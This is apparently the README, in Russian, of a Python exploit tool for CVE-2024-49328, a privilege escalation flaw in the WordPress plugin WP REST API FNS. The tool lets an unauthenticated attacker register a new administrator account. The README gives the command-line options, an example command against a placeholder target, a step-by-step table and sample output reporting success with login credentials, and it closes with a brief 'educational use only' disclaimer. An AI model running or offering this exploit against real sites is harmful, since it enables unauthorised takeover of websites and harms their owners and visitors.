
Python-скрипт для эксплуатации уязвимости повышения привилегий в плагине WordPress WP REST API FNS, позволяющий неавторизованное создание учётных записей администратора.
Этот скрипт эксплуатирует уязвимость повышения привилегий в плагине WP REST API FNS для WordPress. Уязвимость затрагивает все версии до 1.0.0 включительно, что позволяет неаутентифицированным атакующим получить привилегии администратора.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
Пример команды:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
| Шаг | Описание | Иконка |
|---|
| Шаг 1 | Проверьте версию плагина. | 📝 |
| Шаг 2 | Проверьте, эксплуатируема ли версия (1.0.0 или ниже). | ✅ |
| Шаг 3 | Эксплуатируйте уязвимость и зарегистрируйте нового администратора. | 🔒 |
| Шаг 4 | Выведите результат с учетными данными для проверки. | 🎉 |
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 Предупреждение:
Этот скрипт предназначен только для образовательных целей. Несанкционированное использование этого скрипта против систем без явного разрешения незаконно и неэтично.